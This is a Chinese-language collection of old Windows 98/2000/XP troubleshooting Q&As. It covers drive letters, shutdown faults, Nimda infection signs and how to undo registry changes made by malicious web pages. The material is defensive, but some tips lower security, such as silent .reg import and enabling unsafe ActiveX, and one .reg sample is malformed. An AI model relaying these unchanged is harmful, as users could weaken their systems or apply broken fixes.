    答：在Win98中，Marlett是一个系统字体文件，窗口的最小化、最大化等按钮，就是用它来显示的。从你描述的情况可以看出，这个字体文件已经被破坏或被删除。你只要到安装了Win98第二版的机器上拷贝一个好的Marlett字体文件，然后再将它拷贝到自己系统的Windows\fonts目录下(都要在DOS状态下进行)就行了。如果本机上的Marlett.ttf文件存在但被破坏，那么先要去掉原来字体文件的隐藏属性，这样才能覆盖它。如果对DOS操作不熟悉，可以使用The Font Thing(下载地址：http://www.onlinedown.net/thefont.htm)之类软件在Windows下进行字体的拷贝和安装。

打开硬盘分区出错
    问：我用Windows优化大师对系统作了优化后，不知道是误操作还是怎么了，发现E盘图标变成优化大师图标，双击E盘会进入MS-DOS方式，单击右键然后选“打开”才能进入E盘，请问如何让E盘恢复正常？

    答：打开注册表编辑器，找到HKEY_CLASSES_ROOT\Drive，把右边的默认值里面的内容删除。图标的修改是：找到HKEY_CLASSES_ROOT\Drive\DefaultIcon，修改右边的图标为你需要的图标。以Windows XP为例，这个键值是：%SystemRoot%\System32\shell32.dll，8(不同的操作系统，该键值是不同的)。

注册表文件不出现确认对话框

  去掉导入注册文件时弹出的对话框，只要打开注册表编辑器，展开到HKEY_CLASSES_ROOT\regfile\shell\open\command，将右边名称为“默认”的数据 regedit.exe "1" 改为 regedit.exe /s "1" 即可。如果想恢复的话，只要去掉“/s”即可。

多系统安装

首先在BIOS中设置系统启动顺序为“光盘优先启动”，然后把Win98安装光盘放入光驱，启动电脑进行安装。在“选择Windows 98的安装目录”窗口上选择“其他目录”，并指定为“E:\WINDOWS”，然后按常规方法完成安装。

    恢复多系统启动菜单

当你安装完Win98后，重新启动电脑，是不是发现我们熟悉的多系统启动菜单并没有出现，致使Win2000和WinXP都无法启动了，这如何是好？不要着急，下面我们就一步一步来恢复多系统启动菜单。

①首先在BIOS中设置系统启动顺序为“光盘优先启动”，然后将Win2000安装光盘放入光驱，进入安装画面，这时有三个选项可供选择，按“R”进入修复项。

②“Windows 2000修复选项”中提供了两个选项，再次按“R”键选择“用紧急修复过程修复Windows 2000”，出现“手工修复”和“快速修复”两个选择项，选择“手工修复”。

③接下来进入“选择修复任务”窗口，点击“[X] 验证Windows 2000系统文件”选项，再点击“继续（执行所选任务）”，开始修复启动扇区。

④这时，Windows 2000安装修复程序会询问你是否有紧急修复软盘。因为我们不需要修复软盘，所以按“L”键让安装程序自动查找Windows 2000不能启动的原因。Windows 2000修复程序找到需要恢复的Windows 2000，按下回车键进行恢复。这时，修复程序会自动检查磁盘、引导扇区，然后设置启动菜单，这样，不但找回不能启动的Win2000，而且还能把Win98自动加入启动菜单中。

⑤虽然启动菜单中有了Win2000和Win98，但WinXP依旧还是没有恢复，不用着急！进入Windows2000，把Windows XP安装光盘放入光驱，然后进入光盘的i386目录，可以找到ntldr和Ntdetect.com两个文件，把它们拷贝到C:\下，这时候多系统菜单就恢复了，WinXP也可以进入了。但你会发现多系统启动菜单居然变成了英文的了，这个时候我们可以到C:盘根目录下打开一个Boot.ini文件，只要编辑一下里面的内容即可。

解决多硬盘盘符混乱问题

    现象：在安装了第二块硬盘后，老硬盘与新硬盘上的盘符会出现盘符交叉的现象，在调用文件的时候就会出现很多麻烦，甚至导致某些程序无法使用。

方法：
    1.屏蔽硬盘法
将两块硬盘设置好主从关系并正确连接，然后开机进入BIOS设置程序。在“Standard CMOS Features”选项中将从盘参数项设为“NONE”，屏蔽掉从盘。在“Advanced BIOS Features”选项中设置主盘为启动硬盘。保存设置后重新启动，则硬盘盘符就会按照主、从盘的分区顺序排列好了。这种方法的缺点是从盘只能在Windows下正常使用，在纯DOS模式下无法识别从盘。

2.重新分区法
设置好主从关系并正确连接硬盘后，使用任一款分区软件将从盘全部划为逻辑分区，则从盘的盘符就会按顺序排在主盘后面。(陈会安)

3.Win 9x：使用Letter Assigner
Letter Assigner能够任意指定硬盘的盘符。启动Letter Assigner，在Letter Assigner的工具栏下方列出了“A～Z”26个盘符，其中黄色表示当前可以选择使用，灰色表示当前不可使用。在主窗口中选中需要修改的盘符，然后从盘符栏中选择修改后的盘符，执行“文件→保存”命令，重新启动计算机即可。

在操作过程中，如果需要放弃修改，只要执行“编辑→恢复原版”或者按下“Ctrl+Z”组合键即可。一般情况下系统盘的盘符不能修改，否则可能造成系统启动错误。当修改系统盘的盘符时，Letter Assigner会弹出一个提示窗口。(LanFu)

4.Win 2000/XP：操作系统设置法
以上几种方法建议大家只在Win 9x\Me下使用，而在 Win 2000\Me下硬盘的混乱问题已经得到解决，并且可以通过设置指定驱动器名。

以Win 2000为例，操作步骤是：打开“控制面板→管理工具→计算机管理”，接着展开“存储→磁盘管理”，右键选中需要调整的分区，选择“更改驱动器名和路径”选项，点击“编辑”按钮，然后进行调整工作即可。

注意：所设定的驱动器名称只能是未使用过的；当设定完成后，会弹出警告窗口，说该操作可能造成驱动器停止，不用理会，点击“确定”即可。(任亚维)

5.利用PartitionMagic
PartitionMagic(分区魔术师)可以对硬盘进行重新分区、格式化、复制分区等操作，使用它修改盘符的操作方法如下：

启动PartitionMagic，鼠标右击需要修改的盘符，在快捷菜单中选择“高级→修改驱动器盘符”，然后在弹出的“更改驱动器盘符”窗口中选择新的盘符，单击“确定”按钮，接着选择“常规→应用改变”命令，按照提示重新启动即可。

另：

    (1)Windows 2000/XP
    Windows 2000/XP一般不会产生盘符交叉的问题，但前提是安装Windows 2000、XP时只安装了一块硬盘，安装结束后才能挂上第二块硬盘，假如是在添加第二块硬盘后安装Windows 2000/XP的话，那么仍然会产生盘符交叉，而且这是永久性的，即使取下第二块硬盘也无济于事。

    不过，我们可以进入“控制面板→管理工具→计算机管理”窗口，在“计算机管理”下选择“磁盘管理”，选中相应分区，从右键菜单中执行“更改驱动器名和路径”命令，在图1对话框中点击“更改”按钮，然后重新指派一个驱动器号，再对其他分区重复执行该命令即可。

    (2)Windows 9x/Me
    有一个简单的办法可以解决这一问题，只须在BIOS设置程序中稍稍动些脑筋，将第一块硬盘设置为“User”或“Auto”，而将第二块硬盘设置为“NONE”，这样尽管BIOS无法发现这块硬盘，但Windows 9x/Me的即插即用功能会自动检测第二块硬盘，并自动分配盘符，令人担心的盘符交叉现象也就不复存在了。当然在纯DOS模式下第二块硬盘是看不到的。

    (3)Fdisk
    我们可以在执行Fdisk命令分区时，选中“Change current fixed disk drive”项，然后选中第二块硬盘将所有分区删除，再选择“Create Extended DOS Partition”将所有空间都分配给扩展分区使用，接下来再进行分区。也就是说不创建主分区只创建扩展分区，最后格式化就行了。

系统关机变重启故障

一、正确设置BIOS

    如果你的计算机连上了网络或者连着USB设备，那么BIOS的设置不对很可能会导致不能正常关机。一般而言，老主板容易出现这种故障，在BIOS里面禁掉网络唤醒和USB唤醒选项即可。

    二、设置电源管理

    关机是与电源管理密切相关的，有时候电源管理选项设置得不正确也会造成关机故障。

    点击“开始→设置→控制面板→电源选项”，在弹出的窗口中，根据需要启用或取消“高级电源支持”（如果你在故障发生时使用的是启用“高级电源支持”，就试着取消它，反之就启用它），Windows 98中这种方法往往能解决大部分电源管理导致的关机故障。

    如果没有选中“高级”菜单里的“在按下计算机电源按钮时(E)：关闭电源”，把它选中即可。

    三、禁用快速关机

    有时使用了Windows的快速关机功能也会导致这类关机故障。在Windows 98中可以通过下列方法来解决：在“开始→运行”中输入Msconfig，打开“系统配置实用程序”，在“高级”选项中选中“禁用快速关机”，然后重启计算机即可。

光驱读盘不正常
    问：我的电脑安装的是Windows XP操作系统，安装好后出现了一个问题，就是不能连续读光盘，插入第一张光盘一切正常，打开光驱放入第二张光盘，发现里边的内容竟是第一张光盘的内容，重新启动机器后，第二张光盘也能正常读出，这是什么原因？

    答：用鼠标右键点击“我的电脑”，选“管理”，选择“存储→可移动存储→库”，点击光驱所在的盘符，在名称项目中点鼠标右键选“属性”，在“延迟卸除”下有一项为“收回不可装入的媒体”，将它的时间改为0，应该可以解决这个问题。如果问题未能解决，则打开注册表编辑器，找到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E965-E325-11CE-BFC1-08002BE10318}键值，将下面的UpperFilters 和LowerFilters删除，重启机器即可。

回收站无法清空
    问：我的系统是Windows XP，我从F盘中删除了一个名为“dvdregionfree3031”的文件后，系统出现问题，表现为回收站中的内容无法清空，而且每次打开回收站时它总先搜索一遍，然后在清空回收站时显示一个确认删除对话框，选“是”后清空，再次打开回收站时又出现了上述情况，请问我该怎么办？

    答：启动到带命令行的安全模式下，然后对每一个分区下的Recycled目录执行Attrib -s -r -h命令去除特殊属性，然后使用Del命令删除每一个分区下的Recycled目录。操作完毕后重新启动进入正常模式，问题一般即能解决。

解决活动窗口按钮被改写

电脑中缺少了“Marlett”字体。

你可以在其他电脑中复制该字体到自己电脑的“控制面板---字体”中，也可以使用安装盘在“文件---安装新字体”中安装该字体。

解决接通电源后自动开机问题

ATX主板经常会遇到这样的问题，一般在主板的BIOS里将电源管理项“POWER ON AFTER PWFAIL”设为OFF即可。

操作系统停止响应
    海南读者李俊来信：我用的是Win 98和Win XP双操作系统。多数时候用Win XP，Win XP在关机或重启时，好些时候它总停在“正在保存系统设置”处，硬盘的灯不再闪烁，系统就不响应了！这是什么原因呢？

    A：启动和关闭计算机时系统总是提示：“正在保存系统设置”，这主要是因为系统运行后加载的文件太多了，导致系统在短时间内运行太多的文件而不能中止，我们可以用“Ctrl+Alt+Del”键调出“Windows任务管理器”，单击“进程”就可以查看当前运行的文件。要解决此类问题，在“开始→运行”中键入“Msconfig”命令，在弹出的“系统配置实用程序”对话框，单击“启动”标签项，这里都是随着系统启动的一些程序，在此将一些不常用程序前面的钩去掉即可。另外，硬盘上的碎片过多也会导致系统关机或重启时间过长甚至造成死机现象，所以我们还要定期对硬盘进行碎片扫描。如果你在关机或注销时设置了声音文件，如果此声音文件破坏也会导致出现这类问题，我们可以到“控制面板→声音和音频设置”中将声音去掉。如果问题仍未解决，我们可以右键点击“我的电脑”，选择“管理”，并在“服务和应用”项中选择“服务”项目，在右侧的窗口中将不必要的服务停用，注意停用前一定要仔细阅读当前服务的文字说明。

解决开机ESCD错误

问：我的电脑在开机的时候，屏幕显示出一段英文提示，大致意思是ESCD写入出现了错误，请问这会不会影响系统正常使用？

答：系统在启动时需要对即插即用设备及非即插即用设备进行自检，然后写入BIOS。出现“ESCD 写入”的错误，可能的原因一是主板BIOS的防改写跳线被选择，这时BIOS数据就无法改写。另一个可能是主板的BIOS芯片造成的，如果BIOS芯片有损坏的话，可能会造成信息不能完全写入。这种现象对系统正常使用没有什么大的影响，你可以不必理会。

开始菜单响应速度过慢
    问：我每次单击Windows的开始菜时，弹出下一组菜单都非常慢，可是以前单击开始菜单时却很快，我想问问用什么方法可以调节开始菜单的弹出速度？

    答：开始菜单的弹出速度是可以控制的，我们可以在控制面板中对它进行修改：打开注册表编辑器，依次展开HKEY_CURRENT_USER\ControlPanel\desktop分支，然后在此创建一个DWORD值，并将它命名为“Menushowdelay”，你可以将该键的键值设为0至0100000之间的值，这个值就是显示菜单延长时间的值，单位为MS，输入后重启计算机即可生效。

解决控件提示问题

    Q：我在用OE脱机浏览邮件时，总是出现这样的警告信息：“该页上的ActiveX控件不安全，当前安全设置禁止运行该页上的不安全控件，因此，可能无法正确显示该页”。“安全设置”中我设置的是“中”，即使调到低也是同样的情况，请问这是为什么，如何避免？

    A：这是因为OE(IE)中对Internet上Web页面的安全设置出现的一个提示信息。在“选项”的“安全设置”中，选定为“中”级时，“对没有标记为安全的ActiveX控件进行初始化和脚本运行”设为“禁用”；选定为“低”级时，则设为“提示”。这样，当浏览Web页面的邮件时，就会出现无法显示(“禁用”时)或不安全的提示(“提示”时)。如若我们确实需要浏览该Web页面的邮件时，可在OE(或IE)“选项”的“安全设置”中，选定为“自定义级别”，对“对没有标记为安全的ActiveX控件进行初始化和脚本运行”设为“启用”即可。为防不测，在浏览时要开启病毒监控。 (重庆 孙先华)

解决某些网页不能访问

问：我单位有一个小型局域网，安装了ADSL共享上网，速度很快，可是存在一个很麻烦的问题，就是某些网站常常无法正常访问(比如新浪网站)，请问如何解决？

答：如果使用ADSL时某些网页上不去，可能是因为网络的MTU值不匹配的缘故。“MTU”是“Maximum Transfer Unit”(最大传输单元)的英文缩写。MTU定义了基于TCP/IP协议在网络中传输的每一个数据包所含的字节数，修改MTU值的参数可以提高网络访问的速度。操作系统对MTU有一个默认值，但并不是最优化的设置，如果使用者不满意的话，可以自己调整这项参数的设置。

具体方法：一是在Win98系统中选择“网络”选项中的“拨号网络适配器”，然后单击“属性”，在新出现窗口中再选中“高级”选项，里面有一个“IP包大小”的选项，用户可以自己调整其中的大小级别。第二种方法是运行REGEDIT程序，找到注册表中的HKEY_LOCAL_MACHINE\Enum\Root\Net选项，修改其中的MTU数值，当然也可以使用专门的软件，比如MTU Speed Pro来修改这一数值。

“内存不足”的解决方法

    大家在应用电脑时一定都遇到过机器提示内存不足的现象吧，那么什么是内存不足，又该如何处理呢，下面我们就来讲一讲有关这方面的内容。

    所谓“内存不足”就是指在启动或运行DOS应用程序和Windows应用程序时，系统报“Out of memory"或“内存不足"的错误信息。“内存不足”是一种很常见的故障，运行DOS应用程序和Windows应用程序引起“内存不足”的原因不完全相同。

    一、DOS下的内存不足

    如果是在运行DOS应用程序时出现“ Out of memory”（内存不足）的故障，可按以下方法进行检查和处理：

    1、检查系统是否提供对扩充内存的支持，必须保证CONFIG.SYS文件中的EMM386.EXE命令中含有RAM参数，关于RAM参数的设置请参考相关文章，这里就不述叙；

    2、 如果故障仍存在，检查DOS内核程序与其它运行的应用程序是否兼容，某些程序是否占用了大量的常规内存，并作出相应的处理。

    举个例子：一次我在运行WPS 时，屏幕显示“内存不够”，系统无法运行。考虑到在运行WPS之前曾执行过一些其它程序，可能是这些程序没有完全从内存中退出，于是重新启动，运行金山汉字系统，WPS 编辑软件仍无法进入，用DOS 6.22的Mem命令查看内存，仅剩200KB左右的空间，且CHLIB文件占用主内存达255KB，即字库放在了常规内存中，而金山系统是应该可以自动使用扩展内存存放字库的，查看系统配置情况，在CONFIG.SYS中设有：

    DEVICE=C：\DOS\HIMEM.SYS
    DOS=HIGH

    这就是说，DOS内核程序调入扩展内存后，虽然扩大了可用主内存空间，但是由于扩展内存与金山系统发生冲突，以致汉字库无法载入扩展内存。解决的办法有两种：

    1、去掉DOS=HIGH设置，将DOS内核程序从扩展内存撤出，即可正常运行。

    2、将“/DEVICE=C：\DOS\HIMEM.SYS"改为“/DEVICE=C：\DOS\HIMEM.SYS/INT15=320"，因金山系统使用的是扩展内存的低端，这一区域若有其它程序驻留，字库就不能正常载入，利用INT15参数给系统先预留出一部分传统的扩展存储器(即不由XMS规范管理而由INT15直接使用的扩展存储器)，字库和DOS内核都可使用扩展内存了，这样设置之后，在金山汉字系统状态下可用的主内存空间可达512KB，比不设置时多出250KB左右。

    二、Windows中的内存不足

    如果在运行Windows应用程序时，出现“内存不足”的故障，可按下列方法进行检查和处理：

    1、首先应检查Windows的资源使用情况，如果资源占用较多，可用资源较少，打开新文件时会出现“内存不足"的问题。这时可以清理屏幕，减少窗口的数目，关闭不用的应用程序，包括TSR内存驻留程序，将Windows应用程序最小化为图标，如果问题只是在运行一特殊的应用程序时出现，则与应用软件销售商联系，可能是数据对象的管理不好所致；

    2、如果问题没有解决，清除或保存Clipboard(剪贴板)的内容，使用ControlPanel Desktop选项将墙纸(Wallpaper)设置为None；

    3、如问题仍存在，可用PIF编辑器编辑PIF文件，增大PIF文件中定义的MemoryRequirements：KB Required的值；在标准模式下，选择Prevent ProgramSwitch，该开关选项打开后，退出应用程序返回Windows；如果是386增强模式，则要将Display Usage设置成Full Screen(全屏幕方式)，将Execution设置为Exclusive，将Video memory设置为尽可能低的方式；

    4、 如果问题仍存在，则重新开机进入Windows系统，并且确保在“启动"图标中没有其它无关的应用软件同时启动运行，在WIN.INI文件中也没有Run或Load命令加载的任何无关的应用程序。

    在平时，出现“内存不足"的问题一般可以按以下办法处理。首先，退出那些不需要运行的应用程序，然后，再检查系统的可用资源为多少。如果可用资源大于30％，一般可以运行新的程序。当有多个应用程序在系统中运行时，可以退出一个，检查一次可用资源，如果某个应用程序在退出前后，可用资源的百分比没有变化，说明这个应用程序没有释放它所占用的资源。如果要收回这些没有释放的资源，只能退出Windows后，再重新进入Windows。为了确保在启动进入Windows时系统的可用资源足够，在“启动"图标中应该没有无关的应用软件同时启动运行，在WIN.INI文件中也没有由Run或Load命令加载的任何无关的应用程序，因为这些同时启动的无关应用程序可能已经占用了很多资源，使得要使用的应用程序无法运行。

    一般说来，经过这样处理，就不会出现“内存不足"的问题了。

任务栏的图标变大了
    问：近日，不知执行了什么操作，任务栏上的图标变得和桌面上的一样大，虽然不影响使用，但看起来非常不美观。请问怎样才能让它恢复原样呢？

    答：运行regedit.exe打开注册表编辑器，找到HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetrics，在右边的窗口中找到字符串值：“Shell Icon Size”，改变其值就可以改变图标的大小。一般是“32”这个数值。注意修改注册表前请事先备份注册表。

解决鼠标乱动问题

   现象：鼠标有时胡乱乱动，不听指挥。我怀疑是有病毒或木马之类，所以用金山毒霸、iparmor5.33、the cleaner查杀过，均未发现过问题。但我在“系统信息→正在运行的任务”下发现几个没有路径、版本和任何信息的任务。不知道和这有没有关，请问这三个任务是什么东西，能否删除，怎样删除？

这是一种NIMDA病毒。解决方案如下：

(1) 检查临时文件夹是否存在MEPXXXX. tmp 和MEPXXXX.tmp.exe文件，XXXX是由字幕和数字随机组成的字符串。

(2) 检查C:\，D:\，E:\是否存在httpodbc.dll文件。

(3) 是否带宽被严重占用。

(4) 在Windows 9x/ME系统中，\Windows\ system目录下是否存在LOAD.exe文件。

(5) 在Windows NT/2K系统中，\Windows\ System目录下是否存在CSRSS.exe隐藏文件。

建议你下载Symantec和Trendmicro的查杀Nimda_E病毒工具进行检测和清除。http://support.marsec.net/focus/nimda_e/FxNimdaE.com

http://support.marsec.net/focus/nimda/trend_nimda.zip

查杀步骤：

（1）在http://support.marsec.net/focus/nimda_e/FxNimdaE.com下载FxNimdaE.com，存放在系统里。

（2）停掉系统所有正在运行的程序。如果你的系统是Windows Me，你必须停掉Windows Me的系统恢复功能，因为病毒有可能被自动保存在备份目录里。双击运行FxNimdaE. com，运行此程序需要你以系统管理员帐号登录，在操作前停掉IIS服务或者拔离网线，以免在清除过程中再次感染。然后点击Start键运行程序直到报告说系统已经清除掉病毒。

解决鼠标右键被锁定

    问：我的电脑不知道为什么鼠标右键被锁定了，用不了。请问如何解决？

    答：可能是有人在你的注册表中做了手脚，锁定了右键菜单。打开注册表编辑器，选择以下子键：

    “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer”在右窗格中找一个名为“NoViewContexMenu”的键值，把其数据改为00 00 00 00。或者干脆删除这个键值即可。

解决“添加删除程序”里面隐藏问题

在C:\Windows\Inf下找到Sysoc.inf文件，用记事本程序打开它，该文件显示了当前已安装程序的部分列表。我们拿MSN Messenger来做个实验，在其中找到这一句“msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7”，其中“msmsgs”是MSN Messenger的条目名，“hide”这个参数就是控制着程序是否在“添加/删除程序”中显示，我们只要把它删除，变为“msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,,7”，然后重新启动电脑，再次到“添加/删除程序”中，就会看到MSN Messenger了。
    根据这个道理，可以把Sysoc.inf文件中包含的“hide”全部删除，这样那些被隐藏的组件就都会在“添加/删除程序”中全部显示出来了。

win98图标老乱套，与文件类型不配，

1、在安全模式下运行grpconv（在Windonws目录下）试试；

2、在安全模式下删了ShellIconCache文件（在Windonws目录下，是隐藏文件）然后重启。

这是由于Windows的图标缓冲文件被破坏了，启动“资源管理器”程序，然后进入Windows系统文件夹，找到一个名为ShellIconCache的文件，并将它删除。再重新启动Windows，Windows就会重建图标缓冲文件，桌面上的图标就会恢复原状。由于这个文件是隐藏文件，所以大家可以通过Windows查找功能来找到它。当然我们也可以通过“文件夹选项”来显示隐藏文件，找到后将它删除。

网页恶意代码的十一大危害及其解决方案

（一）如何在注册表被锁定的情况下修复注册表
   注册表被锁定这一招是比较恶毒的，它使普遍用户即使会简单修改注册表使其恢复的条件下，困难又多了一层。症状是在开始菜单中点击“运行”，在运行框中输入regedit命令时，注册表不能够使用，并发现系统提示你没有权限运行该程序，然后让你联系系统管理员。

    这是由于注册表编辑器：

    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System下的DWORD值“DisableRegistryTools”被修改为“1”的缘故，将其键值恢复为“0”即可恢复注册表的使用。

   解决办法:

  （1）可以自己动手制作一个解除注册表锁定的工具，就是用记事本编辑一个任意名字的.reg文件，比如recover.reg，内容如下：
   REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000

  要特别注意的是：如果你用这个方法制作解除注册表锁定的工具，一定要严格按照上面的书写格式进行，不能遗漏更不能修改（其实你只需将上述内容“复制”、“粘贴”到你机器记事本中即可）；完成上述工作后，点击记事本的文件菜单中的“另存为”项，文件名可以随意，但文件扩展名必须为.reg（切记）,然后点击“保存”。这样一个注册表解锁工具就制作完成了，之后你只须双击生成的工具图标，其会提示你是否将这个信息添加进注册表，你要点击“是”，随后系统提示信息已成功输入注册表，再点击“确定”即可将注册表解锁了。

   (2)也可以直接下载下面这个解锁工具，下载完成运行后可直接解锁注册表编辑器：

               http://it.rising.com.cn/antivirus/net_virus/spiteful/enable.reg

（二）篡改IE的默认页

   有些IE被改了起始页后，即使设置了“使用默认页”仍然无效，这是因为IE起始页的默认页也被篡改了。具体说就是以下注册表项被修改：

    HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\Default_Page_URL

  “Default_Page_URL”这个子键的键值即起始页的默认页。

    解决办法：

    运行注册表编辑器，然后展开上述子键，将“Default_Page_UR”子键的键值中的那些篡改网站的网址改掉就行了，或者将其设置为IE的默认值。

（三）修改IE浏览器缺省主页，并且锁定设置项，禁止用户更改

   主要是修改了注册表中IE设置的下面这些键值(DWORD值为1时为不可选)：

   HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel
   "Settings"=dword:1

   HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel
    "Links"=dword:1

   HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel
    "SecAddSites"=dword:1

   解决办法：

   将上面这些DWORD值改为“0”即可恢复功能。

（四）IE的默认首页灰色按扭不可选

       这是由于注册表HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Control Panel

    下的DWORD值“homepage”的键值被修改的缘故。原来的键值为“0”，被修改后为“1”（即为灰色不可选状态）。

    解决办法：

    将“homepage”的键值改为“0”即可。

（五）IE标题栏被修改

     在系统默认状态下，是由应用程序本身来提供标题栏的信息，但也允许用户自行在上述注册表项目中填加信息，而一些恶意的网站正是利用了这一点来得逞的：它们将串值Window Title下的键值改为其网站名或更多的广告信息，从而达到改变浏览者IE标题栏的目的。

    具体说来受到更改的注册表项目为：

   HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title

   HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title

    解决办法：

    ①在Windows启动后，点击“开始”→“运行”菜单项，在“打开”栏中键入regedit，然后按“确定”键；

    ②展开注册表到

   HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main下，在右半部分窗口中找到串值“Window Title” ，将该串值删除即可，或将Window Title的键值改为“IE浏览器”等你喜欢的名字；

    ③同理，展开注册表到

   HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main

    然后按②中所述方法处理。

    ④退出注册表编辑器，重新启动计算机，运行IE，你会发现困扰你的问题被解决了！

（六）IE右键菜单被修改
  受到修改的注册表项目为：

   HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt

   下被新建了网页的广告信息，并由此在IE右键菜单中出现！

   解决办法：

   打开注册标编辑器，找到

   HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt

   删除相关的广告条文即可，注意不要把下载软件FlashGet和Netants也删除掉，这两个可是“正常”的，除非你不想在IE的右键菜单中见到它们。

（七）IE默认搜索引擎被修改

    在IE浏览器的工具栏中有一个搜索引擎的工具按钮，可以实现网络搜索，被篡改后只要点击那个搜索工具按钮就会链接到那个篡改网站。出现这种现象的原因是以下注册表被修改：

    HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search\CustomizeSearch

    HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search\SearchAssistant

    解决办法：

    运行注册表编辑器，依次展开上述子键，将“CustomizeSearch”和“SearchAssistant”的键值改为某个搜索引擎的网址即可。

（八）系统启动时弹出对话框

    受到更改的注册表项目为：

    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon

    在其下被建立了字符串“LegalNoticeCaption”和“LegalNoticeText”，其中“LegalNoticeCaption”是提示框的标题，“LegalNoticeText”是提示框的文本内容。由于它们的存在，就使得我们每次登陆到Windwos桌面前都出现一个提示窗口，显示那些网页的广告信息！

    解决办法：

    打开注册表编辑器，找到

    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon

    这一个主键，然后在右边窗口中找到“LegalNoticeCaption”和“LegalNoticeText”这两个字符串，删除这两个字符串就可以解决在登陆时出现提示框的现象了。

（九）IE默认连接首页被修改

     IE浏览器上方的标题栏被改成“欢迎访问……网站”的样式，这是最常见的篡改手段，受害者众多。

  受到更改的注册表项目为：

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page

  HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page

     通过修改“Start Page”的键值，来达到修改浏览者IE默认连接首页的目的，如浏览“万花谷”就会将你的IE默认连接首页修改为“http://on888.home.chinaren.com ”，即便是出于给自己的主页做广告的目的，也显得太霸道了一些，这也是这类网页惹人厌恶的原因。

    解决办法：

    ①在Windows启动后，点击“开始”→“运行”菜单项，在“打开”栏中键入regedit，然后按“确定”键；

    ②展开注册表到
   HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main下，在右半部分窗口中找到串值“Start Page”双击 ，将Start Page的键值改为“about:blank”即可；

    ③同理，展开注册表到
    HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
    在右半部分窗口中找到串值“Start Page”，然后按②中所述方法处理。

    ④退出注册表编辑器，重新启动计算机，一切OK了！

    特殊例子：当IE的起始页变成了某些网址后，就算你通过选项设置修改好了，重启以后又会变成他们的网址啦，十分的难缠。其实他们是在你机器里加了一个自运行程序，它会在系统启动时将你的IE起始页设成他们的网站。

    解决办法：运行注册表编辑器regedit.exe，然后依次展开
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Run

    主键，然后将其下的registry.exe子键删除，然后删除自运行程序c:\Program Files\registry.exe，最后从IE选项中重新设置起始页。

（十）IE中鼠标右键失效

      浏览网页后在IE中鼠标右键失效，点击右键没有任何反应！

    有的网络流氓为了达到其恶意宣传的目的，将你的右键弹出的功能菜单进行了修改，并且加入了一些乱七八糟的东西，甚至为了禁止你下载，将IE窗口中单击右键的功能都屏蔽掉。

解决办法：

    1.右键菜单被修改。打开注册表编辑器，找到HKEY_CURRENT_USER＼Software＼Microsoft＼Internet Explorer＼MenuExt，删除相关的广告条文。

2.右键功能失效。打开注册表编辑器，展开到HKEY_CURRENT_USER＼Software＼Policies＼Microsoft＼Internet Explorer＼Restrictions，将其DWORD值"NoBrowserContextMenu"的值改为0。

（十一）查看“源文件”菜单被禁用

       在IE窗口中点击“查看”→“源文件”，发现“源文件”菜单已经被禁用。

    恶意网页修改了注册表，具体的位置为：

    在注册表
    HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer

    下建立子键“Restrictions”，然后在“Restrictions”下面建立两个DWORD值：

“NoViewSource”和“NoBrowserContextMenu”，并为这两个DWORD值赋值为“1”。

    在注册表
   HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Restrictions
  下，将两个DWORD值：“NoViewSource”和“NoBrowserContextMenu”的键值都改为了“1”。

    通过上面这些键值的修改就达到了在IE中使鼠标右键失效，使“查看”菜单中的“源文件”被禁用的目的。

    解决办法：

    将以下内容另存为后缀名为.reg的注册表文件，比如说unlock.reg，双击unlock.reg导入注册表，不用重启电脑，重新运行IE就会发现IE的功能恢复正常了。

    REGEDIT4

    HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions

   “NoViewSource”=dword:00000000

    "NoBrowserContextMenu"=dword:00000000

    HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Restrictions

    “NoViewSource”=dword:00000000

    “NoBrowserContextMenu”=dword:00000000

找回Administrator账户密码
    广西读者CJY来信：我的WinXP安装在NTFS分区上。在使用故障修复控制台时，程序要求我输入Administrator的密码，可我已经不记得密码了(安装WinXP时，设置密码了)。请问有什么方法可以帮我找回密码吗？

